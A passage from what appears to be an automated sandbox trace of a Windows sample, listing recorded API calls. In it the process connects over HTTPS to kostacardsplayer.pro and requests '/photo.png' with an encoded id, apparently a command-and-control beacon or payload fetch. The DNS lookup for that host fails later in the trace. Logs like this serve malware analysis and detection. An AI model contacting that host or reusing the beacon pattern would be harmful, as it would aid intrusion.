"arguments": [ + { + "name": "UserAgent", + "value": "" + }, + { + "name": "ProxyName", + "value": "" + }, + { + "name": "ProxyBypass", + "value": "" + }, + { + "name": "AccessType", + "value": "0x00000000" + }, + { + "name": "Flags", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 413 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431696", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpConnect", + "status": true, + "return": "0x005011d0", + "arguments": [ + { + "name": "SessionHandle", + "value": "0x004f9180" + }, + { + "name": "ServerName", + "value": "kostacardsplayer.pro" + }, + { + "name": "ServerPort", + "value": "443" + } + ], + "repeated": 0, + "id": 414 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x024316d0", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpOpenRequest", + "status": true, + "return": "0x005012f8", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x005011d0" + }, + { + "name": "Verb", + "value": "GET" + }, + { + "name": "ObjectName", + "value": "/photo.png?id=0108B4F53D30923DC90000000000FF40000005" + }, + { + "name": "Version", + "value": "" + }, + { + "name": "Referrer", + "value": "" + }, + { + "name": "Flags", + "value": "0x00800000" + } + ], + "repeated": 0, + "id": 415 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x024316f7", + "parentcaller": "0x00000000", + "category": "network", + "api": "WinHttpSetOption", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "InternetHandle", + "value": "0x005012f8" + }, + { + "name": "Option", + "value": "0x0000001f" + }, + { + "name": "Buffer", + "value": "\\x003\\x00\\x00" + } + ], + "repeated": 0, + "id": 416 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\webio" + }, + { + "name": "DllBase", + "value": "0x739e0000" + } + ], + "repeated": 0, + "id": 417 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\system32\\mswsock" + }, + { + "name": "DllBase", + "value": "0x6db80000" + } + ], + "repeated": 0, + "id": 418 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + }, + { + "name": "BaseAddress", + "value": "0x6db80000" + } + ], + "repeated": 0, + "id": 419 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\IPHLPAPI" + }, + { + "name": "DllBase", + "value": "0x738c0000" + } + ], + "repeated": 0, + "id": 420 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 421 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\NSI" + }, + { + "name": "DllBase", + "value": "0x76040000" + } + ], + "repeated": 0, + "id": 422 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "9452", + "caller": "0x02431706", + "parentcaller": "0x00000000", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\WINNSI" + }, + { + "name": "DllBase", + "value": "0x73900000" + } + ], + "repeated": 0, + "id": 423 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0050e000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 424 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0050f000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 425 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 426 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x00000370" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 427 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00512000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 428 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00513000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 429 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "440", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 430 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "8940", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x022a3000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 431 + }, + { + "timestamp": "2025-03-07 21:41:19,171", + "thread_id": "8940", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 432 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00525000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 433 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 434 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x72e38000" + }, + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 435 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x72e38000" + }, + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 436 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x72dbed9e", + "parentcaller": "0x72da3e84", + "category": "services", + "api": "OpenSCManagerW", + "status": true, + "return": "0x00513b48", + "arguments": [ + { + "name": "MachineName", + "value": "" + }, + { + "name": "DatabaseName", + "value": "" + }, + { + "name": "DesiredAccess", + "value": "0x00000001", + "pretty_value": "SC_MANAGER_CONNECT" + } + ], + "repeated": 0, + "id": 437 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x72dbedb9", + "parentcaller": "0x72da3e84", + "category": "services", + "api": "OpenServiceW", + "status": true, + "return": "0x00513918", + "arguments": [ + { + "name": "ServiceControlManager", + "value": "0x00513b48" + }, + { + "name": "ServiceName", + "value": "WinHttpAutoProxySvc" + }, + { + "name": "DesiredAccess", + "value": "0x00000094", + "pretty_value": "SERVICE_QUERY_STATUS|SERVICE_START|SERVICE_INTERROGATE" + } + ], + "repeated": 0, + "id": 438 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x72e38000" + }, + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 439 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x72e38000" + }, + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 440 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b90b8", + "parentcaller": "0x75096ff4", + "category": "threading", + "api": "NtOpenThread", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadHandle", + "value": "0x000003ec" + }, + { + "name": "DesiredAccess", + "value": "0x00100010", + "pretty_value": "THREAD_SET_CONTEXT|0x00100000" + }, + { + "name": "ProcessId", + "value": "9448" + }, + { + "name": "ThreadId", + "value": "9156" + } + ], + "repeated": 0, + "id": 441 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x72e38000" + }, + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 442 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x72e38000" + }, + { + "name": "ModuleName", + "value": "WINHTTP.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 443 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x75097fbf", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003ec" + } + ], + "repeated": 0, + "id": 444 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8b4a", + "parentcaller": "0x72dbecf3", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003e8" + } + ], + "repeated": 0, + "id": 445 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00528000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 446 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0052a000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 447 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x770564c6", + "parentcaller": "0x770563d1", + "category": "threading", + "api": "NtTestAlert", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 448 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "8940", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x000003fc" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 449 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "8940", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 450 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "8940", + "caller": "0x7512104c", + "parentcaller": "0x7511e3b8", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 451 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "8940", + "caller": "0x77057a99", + "parentcaller": "0x75122407", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 452 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756b8c89", + "parentcaller": "0x72d9cb7a", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003e8" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 453 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003f0" + } + ], + "repeated": 0, + "id": 454 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x770225b6", + "parentcaller": "0x77021fc0", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003f4" + } + ], + "repeated": 0, + "id": 455 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756c7924", + "parentcaller": "0x7511c105", + "category": "system", + "api": "NtDuplicateObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SourceProcessHandle", + "value": "0xffffffff" + }, + { + "name": "SourceHandle", + "value": "0xfffffffe" + }, + { + "name": "TargetProcessHandle", + "value": "0xffffffff" + }, + { + "name": "TargetHandle", + "value": "0x000003f0" + }, + { + "name": "Options", + "value": "0x00000002" + } + ], + "repeated": 0, + "id": 456 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x0052d000" + }, + { + "name": "RegionSize", + "value": "0x00003000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 457 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x7701e38c", + "parentcaller": "0x7701e318", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x001d1000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 458 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00530000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 459 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8236", + "parentcaller": "0x7553ab4f", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\mswsock.dll" + }, + { + "name": "BaseAddress", + "value": "0x6db80000" + } + ], + "repeated": 1, + "id": 460 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8236", + "parentcaller": "0x75535580", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\DNSAPI" + }, + { + "name": "DllBase", + "value": "0x73610000" + } + ], + "repeated": 0, + "id": 461 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72de5097", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003d8" + } + ], + "repeated": 0, + "id": 462 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72da2629", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003d4" + } + ], + "repeated": 0, + "id": 463 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x756b8b4a", + "parentcaller": "0x72de50ec", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003e8" + } + ], + "repeated": 0, + "id": 464 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "1720", + "caller": "0x770225b6", + "parentcaller": "0x770269b6", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000003ec" + } + ], + "repeated": 0, + "id": 465 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756b8236", + "parentcaller": "0x75535580", + "category": "network", + "api": "GetAddrInfoExW", + "status": false, + "return": "0x000003e5", + "arguments": [ + { + "name": "Name", + "value": "kostacardsplayer.pro" + }, + { + "name": "ServiceName", + "value": "" + } + ], + "repeated": 0, + "id": 466 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 467 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000420" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" + }, + { + "name": "Class", + "value": "Class" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 468 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 469 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000041c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" + } + ], + "repeated": 0, + "id": 470 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 471 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" + } + ], + "repeated": 0, + "id": 472 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 473 + }, + { + "timestamp": "2025-03-07 21:41:19,187", + "thread_id": "9156", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + 